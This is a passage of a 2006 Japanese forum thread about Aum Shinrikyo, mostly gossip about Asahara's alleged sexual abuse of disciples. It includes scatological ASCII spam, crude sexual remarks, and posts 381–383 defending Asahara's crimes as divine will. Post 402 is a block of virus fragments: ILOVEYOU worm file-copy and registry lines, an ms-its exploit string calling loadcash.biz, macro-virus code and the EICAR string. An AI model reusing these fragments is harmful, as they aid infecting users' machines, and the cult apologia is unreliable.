346 :まつもとちづお:2006/10/13(金) 08:06:00 ID:NrJ9OhML
わたしは、たった今、リアの画像で抜いたわけだが。

347 :名無しさん@3周年:2006/10/13(金) 08:12:38 ID:P33tzf9+
>>340
現実には靖国が反対されているわけじゃないでしょう。
戦犯合祀された靖国参拝は軍国化を象徴するからで。
天皇は参拝を望んでないし。
親米K・A政権の参拝固執は宗教を守っているとでも?



348 :名無しさん@3周年:2006/10/13(金) 08:33:30 ID:P33tzf9+
>>291
巨大な歴史的運命って何?
夢想や妄想でなければ
わかりやすくいってほしい。


349 :名無しさん@3周年:2006/10/13(金) 09:10:24 ID:qzzIaeEW
シヴァの喜びさんへあげます。小さくて申し訳ないです。

http://upload.fam.cx/cgi-bin/img-box/qro61013090915.jpg

350 :名無しさん@3周年:2006/10/13(金) 12:33:48 ID:bLg3Am0k
古株の女性幹部の中で、セイゴシになれなかったのってソーナーだけでしょう
その理由は、教組と肉体関係を要求されたとき、
拒んだからか、と思ったけど

同時に、ウッパラバンナも、本人いわく、教組と私はそういう関係に無かったと
しかし、ここ数日で、ウッパラバンナもお手つきだったと
告発がありましたけども、
どっちが本当かね?
もし、ウッパラバンナはお手つきでなく、セイゴシであるなら
肉体関係のあるなしに関わらず、ステージを上げていたわけだけど
もしウッパラバンナがお手つきなら、セイゴシになった女性は全員お手つき、と
いうことにならないか?

つまり、愛人関係を結ばないなら、セイゴシにはなれないと
規定があったと?

351 :名無しさん@3周年:2006/10/13(金) 12:36:48 ID:bLg3Am0k
古株のセイゴシの中で、女性でお手つきじゃないのって、いたの?

352 :名無しさん@3周年:2006/10/13(金) 12:38:43 ID:ZGBCgPFC
愛のイニシエーション・・・素敵です。

353 :名無しさん@3周年:2006/10/13(金) 12:39:26 ID:bLg3Am0k
真面目な人間は嫌いだと、いうことだ
俺の前で、足を開かない女など用はないと、

354 :名無しさん@3周年:2006/10/13(金) 12:39:28 ID:yNkp90wL

麻原、お見事!


355 :名無しさん@3周年:2006/10/13(金) 12:42:24 ID:oBlPPGAi
麻原の勝手な真理の解釈教団=オウム真理教 (現アーレフ)

356 :名無しさん@3周年:2006/10/13(金) 12:44:13 ID:NJlJMflB
>>350
ヒント:女はエネルギー、カルマが悪いと常日頃口にしていた。同時に俺に股を開けば浄化されるとも口にしていた。

357 :名無しさん@3周年:2006/10/13(金) 12:44:26 ID:4wGSduRN
麻原はメシも女も食い放題か。
いいご身分だな。おい、

358 :名無しさん@3周年:2006/10/13(金) 12:50:50 ID:qzzIaeEW
>>357
最終解脱者の特権かも・・・・

359 :名無しさん@3周年:2006/10/13(金) 12:53:16 ID:idhhkiK0
最終解脱するぞ!最終解脱するぞ!最終解脱するぞ!

360 :名無しさん@3周年:2006/10/13(金) 12:57:07 ID:JmQiCi9e
正誤死、解脱者、なんていっても、アサハラと
セックス”した”か”しない”かの違いだろ。

361 :死刑!!麻原さっさと死刑!!!!:2006/10/13(金) 12:58:55 ID:NPRV4JyB
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


362 :糞麻原へ捧げる昼便:2006/10/13(金) 12:59:36 ID:NPRV4JyB
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


363 :名無しさん@3周年:2006/10/13(金) 13:03:47 ID:bLg3Am0k
だって、セックスなんか、動物だって盛りがつけば
放っておいてもするし、虫だってするわけよね?
で、神々はセックスなどしないと、、

オウムにおいて、ある存在に転生したければ、その存在と同じように振る舞い
その存在の要素を身に付けると
たとえば、神に転生したければ、功徳を積むのを喜びとし
言葉を綺麗に語り、戒を守り、セックスは慎む(在家においては)
だよな?

なのに、タントラにおいては、この逆だよね?
両方を一度に説くってのはどうなんだろうね
なんかさ、表向き、奇麗事ば刈り並べているよな

364 :名無しさん@3周年:2006/10/13(金) 13:09:33 ID:JYOXlZVf
造化3神以下5番目くらいまでは独神だから、セックスなどしなかったような

365 :名無しさん@3周年:2006/10/13(金) 13:14:20 ID:bLg3Am0k
漏れには、あからさまに言わせて貰うが疑問がある
全く性欲が湧かなければ、
男は立たないし、女は濡れない
それで、セックスが成り立つのかね?

性欲がなければ、無理なこと やっぱりあるんでしょうね


366 :名無しさん@3周年:2006/10/13(金) 13:22:33 ID:bLg3Am0k
教組の部屋には、ジェルがあるんだ?プッ

367 :名無しさん@3周年:2006/10/13(金) 13:27:51 ID:bLg3Am0k
だって、在家はさ、家に帰ればセックスしていると
フツーの生活を営んでいるってことで、神聖行からはほど遠いから
教団じゃ、ツンボ桟敷でいるんじゃん

いちばんヘッドも、在家で、在家以上にセックスに励んでいるんじゃあね、、
あるいは、アチャリは出家空間にあってエビフライを食っていたそうですが
徳があるからエビフライ食えるということであれば
私だってそれくらい食えますから、、
つまり、
神聖行をなすものに、価値を置くなら置く、と規定するなら
どこも矛盾無くやってもらわないと、わけわかんなくなる

漏れは聞いたよメッタジが、出家は異性を心に思い浮かべてもいけないという
厳しい規定があるのに、、(サマナが戒をやぶるなど)
思い浮かべれば、すぐに好みの異性がデリバリされてくるんですか教祖は

368 :名無しさん@3周年:2006/10/13(金) 13:36:44 ID:bLg3Am0k
>漏れは聞いたよメッタジが、出家は異性を心に思い浮かべてもいけないという
厳しい規定があるのに、、(サマナが戒をやぶるなど)

ああそれなのに、シーハときたら、もうじきハルマゲドンだから
好きな異性と結婚しておけと、言われたらまっすぐソーマのところにいって
(教組がこう言ったんだけど、ボクを受け入れるつもりがあるかい)って
ギャハハハハハハ

それに対するソーマの返事が(実は、、、)
教組と肉体関係があり、それを続けていると、続けているです、とよ
一度きりでなかったということだな
でも、相手は神なので、私は自分をヴァージンだと思っていると
ま、ソーマに罪はないですが
一体、在家に説明しているのと、内容がずいぶん違いますよね
メッタジのいうには、出家の戒は厳しく
心にチラ、と異性を思い浮かべても邪淫なんだと

ま、それで尊敬を集めて金を集めて、ときどきラブホに行くと
ありがちな団体ですね
ま、地上に神など現れない、と平凡なところで納得できましたよ


369 :名無しさん@3周年:2006/10/13(金) 13:39:50 ID:kWRk9YM+
麻原の住処には冷凍のエビが、冷凍庫いっぱいに入ってたらしいからな
やりたい放題いいっすね〜

在家信徒はエビフライ定食を食うくらいなら、牛丼とかパンで我慢して布施したのよ?

370 :名無しさん@3周年:2006/10/13(金) 13:45:05 ID:2aeJR36A
セクースどころかアナル売りのホモ野郎までいるからな

371 :名無しさん@3周年:2006/10/13(金) 13:48:23 ID:bLg3Am0k
なあ、在家にはもうじきハルマゲドンだから、全力で功徳つみなさいって
札ビラ紙にならないうちに、布施したほうがいいよとか
聞いたと思いましたけど

側近には、もうすぐハルマゲドンだから、結婚しておけだとよ
ま、もどきのいうには、もうすぐあんたらには死んでもらうから
思い残すことのないように、女くらい抱いておけって、意味だと

372 :まつもとちづお:2006/10/13(金) 14:45:51 ID:NrJ9OhML
わたしにズリネタ画像を供養しなさい。
いいね!

373 :名無しさん@3周年:2006/10/13(金) 15:33:17 ID:vGatfFrl
オウムの女性信者って顔が麻原みたいになってるだろう。
肉体関係を続けている男女って同じ顔になっていくものだ。

374 :【阿部】詐欺師どりーむろっじ【将英】 :2006/10/13(金) 15:43:15 ID:ChGD1+25
【阿部】詐欺師どりーむろっじ【将英】
http://tmp6.2ch.net/test/read.cgi/ihou/1160609655/l50
http://bbs.2ch2.net/test/read.cgi/sns/1158794718/
http://bbs.2ch2.net/test/read.cgi/lgyouage/1160451610/l50
http://love3.2ch.net/test/read.cgi/pure/1158278045/1-100

375 :名無しさん@3周年:2006/10/13(金) 15:50:54 ID:a8o7JJl2
> ああそれなのに、シーハときたら、もうじきハルマゲドンだから
> 好きな異性と結婚しておけと、言われたらまっすぐソーマのところにいって

人は死ぬ、必ず死ぬ、絶対死ぬ、死は避けられない
それならみんな好きな異性と結婚しておけということじゃん。
そーならそーと初めから言ってくれないと。

376 :名無しさん@3周年:2006/10/13(金) 16:02:38 ID:NJlJMflB
>>370
お前現役だろ?
しつこ過ぎ。
言い負かされてくやしいのかい?(笑)

377 :名無しさん@3周年:2006/10/13(金) 16:15:33 ID:NPRV4JyB
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


378 :名無しさん@3周年:2006/10/13(金) 16:16:59 ID:NPRV4JyB
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


379 :糞麻原へ捧げる昼便:2006/10/13(金) 17:51:58 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


380 :糞麻原へ捧げる昼便:2006/10/13(金) 17:52:49 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


381 :名無しさん@3周年:2006/10/13(金) 18:20:03 ID:bszY+CxS
グルの悪口をあれこれと言うのは見苦しい。
尊師は先進国において全財産布施の出家修行者の弟子が千人以上いた。
それは最終解脱者の尊師しかできないことである。
しかし、尊師はシヴァ神の意志に従って、
自ら作った教団を破壊した。
それはキリストになれという指示があったからです。
そのときに尊師は、
殺人者で性欲の強い凡夫に見えるような演技をした。
これもシヴァ神の意志であろう。
戒律を守り修行を続ける弟子は、
尊師のエネルギーが理解できるから、
それが分かる。
かつて、尊師のエネルギーを感じることができて、
今は尊師のエネルギーが分からなくなっている人は、
自らの観念によって、尊師のエネルギーを遮断している。


382 :名無しさん@3周年:2006/10/13(金) 18:25:31 ID:bszY+CxS
さて今回の救済活動で救済される人は、
(1)グルに帰依して、戒律を守り、修行する人
(2)グルに信はなくしたものの、
  自己の行動に責任を感じ、
  事件被害者に対する慈愛から、
  何らかの賠償活動を行い、
  戒律を守り、修行する人
この二通りの人である。
今回の救済活動で縁が深まる人は、
ひたすら、尊師を憎み、悪口をいい続ける人である。

383 :名無しさん@3周年:2006/10/13(金) 18:30:12 ID:bszY+CxS
グルの悪口をいい続けるということは、
見苦しいとは言うものの、
逆縁を深める効果はある。

今ここで、いろいろと悪口を言い続ける人は、
自分の胸に手を当ててよく考えて見ればいい。
なぜ自分は、このようなことを続けているのだろうか?
それは深い意識で、
もしかしたら尊師は正しかったのではないかという、
恐怖心が残っているからである。
それは深い意識であるから、
本人も気づいていないかもしれない。

本当に尊師を否定するのであれば、
さっさと自分のやりたいことに集中すればいいのではないだろうか?

とは言うものの、
いろいろとグルの悪口を言うのは、
無関心であるよりは救われるので、
頑張ってほしいものだ。

384 :名無しさん@3周年:2006/10/13(金) 18:50:25 ID:9JCseO0/
色々言ってるのは、期待する気持ちの裏返しだったり、自分の行いをなんとか
正当化しようとする気持ちだったり、等々・・・ やっぱり、未練は残ってるし、
ただ者ではないと感じてる部分があるから、未だこだわってるんじゃないかね。

385 :名無しさん@3周年:2006/10/13(金) 18:54:07 ID:rVkiaqmG
そんなんじゃないよ
あんまりあっさり、金取られて、あれやこれや約束したくせに
みんな反故にして、ごめんでもなく死んでいくなんて
こんな奴いるのか、と思っているんだよ
当たり前だろ?


386 :名無しさん@3周年:2006/10/13(金) 19:02:45 ID:X5BVgigD
>>382
は?勝手に犯罪犯しといて、その尻拭いしろってのかい?

387 :名無しさん@3周年:2006/10/13(金) 19:06:02 ID:X5BVgigD
麻原はグルでもなんでも無い
恐怖心など無い
間違ってたと思うから批判している

388 :名無しさん@3周年:2006/10/13(金) 19:11:26 ID:rVkiaqmG
せめて、ごめん、くらい言わないのかね?
嫌な糞爺だよねえ
ゴメン、って言うの嫌だから、キチガイの不利しているのかね

389 :名無しさん@3周年:2006/10/13(金) 19:50:08 ID:JRH0R3Sm
>>383
自分がよく胸に手を当てて考えたほうがええんでないかえ?
「なぜ自分は、このようなことを続けているのだろうか?」とw
深い意識で、 もしかしたら尊師は正しくないのではないか?という、
騙された感があるからその恐怖心から目を背けるために麻原式真理を盲信して
いるだけちゃうんか?とw
人を諭そうとする前に自分の発言が自分で言われて嫌なものの類であることを知りなさい。
それを知らなかったら同じように同じ言葉で反論されるだけ。


390 :糞麻原へ捧げる昼便:2006/10/13(金) 19:53:23 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


391 :糞麻原へ捧げる昼便:2006/10/13(金) 19:53:55 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


392 :糞麻原へ捧げる昼便:2006/10/13(金) 19:55:22 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


393 :死刑!!麻原さっさと死刑!!!!:2006/10/13(金) 20:00:37 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


394 :死刑!!麻原さっさと死刑!!!!:2006/10/13(金) 20:03:51 ID:EMkksd6b
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


395 :名無しさん@3周年:2006/10/13(金) 20:32:48 ID:5q2Ekr29
そぎゃんんじゃないよ
あんまりあっさり、金取られて、あれやこれや約束したくせに
みんな反故にして、ごめんでもなく死んでいくなんて
こぎゃん奴いるのか、と思っとるんたい
当たり前ど?

せめて、ごめん、くらい言わんのかね?
嫌な糞爺たいねえ
ゴメン、って言うの嫌だけん、キチガイの不利しよるのかね


396 :名無しさん@3周年:2006/10/13(金) 20:37:23 ID:5q2Ekr29
好きな異性と結婚しておけと、言われたらまっすぐソーマのとこるにいって
(教組がこう言ったんばってん、ボクば受け入れるつもりがあるかい)って
ギャハハハハハハ

それに対するソーマの返事が(実は、、、)
教組と肉体関係があり、それば続けとると、続けとるです、とよ
いっぺんきりでなかったていうこつだな
でも、相手は神だけん、わしは自分ばヴァージンだと思っとると
ま、ソーマに罪はないばってん


397 :名無しさん@3周年:2006/10/13(金) 21:03:43 ID:gnVgQbJ7
>>382
この人は「オウムに縁のない凡夫・外道は救済されない!」と言いたいみたい。
はあ、なんて高飛車で独善的な発言なんだろう。

「自分達は真理を実践している!」というなら、
慈悲に満ちた発言をしてほしいよ。


398 :名無しさん@3周年:2006/10/13(金) 21:25:44 ID:X5BVgigD
>384
>麻原は)ただ者ではないと感じているから

はい、悪魔だと思っております。
オウム・アーレフとは悪魔崇拝宗教です。

399 :名無しさん@3周年:2006/10/13(金) 21:31:26 ID:gnVgQbJ7
原理主義派の人たちは北朝鮮と全く同じだ。
 自分達の論理・都合しか考えないで、周りを敵対視したり、軽蔑したり
する。
 そしてひたすら自分達のわがままな主張ばかりし、どんどん孤立し
自ら敵を増やし続けている。

 北朝鮮は自国の論理・都合によって核実験まで行って、国際社会から
大変な批難を受け、経済制裁を受けようとしている。

 教団は教団独自の論理・都合によりいまだにこの掲示板でヴァジラヤーナ
・殺人まで肯定する発言をしている。

 この掲示板は公安がずっとチェックし続けている。
 ここでの書き込みは匿名だから明確な証拠としては外部に提示することは
できないけど、教団関係者の本音を知るには最適な情報源だ。

 原理主義派のヴァジラヤーナ・殺人肯定の発言を見ていると、行くところ
まで行くような気がする。

 このままヴァジラヤーナ・殺人肯定の発言をし続けて、
公安が教団をつぶすという決意を固めていくのだろう。

 教団が「進化」という機関紙で「帰依」を特集記事にしたら、
当局が激怒して、教団の重要な収入源であるプログラム関係者が
多く逮捕され、教団の経済は一気に傾き、そのまま分裂に向かった。

 なしたことが返ってきた、自業自得としか言いようがない。
 
 経済の破綻と同時に教団も破綻するだろう。 

400 :名無しさん@3周年:2006/10/13(金) 21:44:50 ID:ZaTL0a98
ホー湖面に写る虚像のような様々な
 
幻影に引きずられ輪廻を浮沈する生き物達
 
彼ら全てが絶対自由、絶対幸福なるマハーニルヴァーナに入るまで
 
四無量心込めてタントラヴァジラヤーナの発願をいたします。

401 :名無しさん@3周年:2006/10/13(金) 21:50:15 ID:IBTMpSKR
>>367

解脱したら何をしてもいいと、私は個人的にはそう思います

                      ナン○カ師かビ○パ師の名言
                      (どっちか忘れた)


402 :死刑!!麻原さっさと死刑!!!!:2006/10/13(金) 21:50:31 ID:EMkksd6b
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.Copy^^^^File f1.path, f1.path+"l"
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub


403 :名無しさん@3周年:2006/10/13(金) 21:51:51 ID:IBTMpSKR
>>367

在家っていうのは出家を支えるものなんだよ
                ナン○カ師の名言

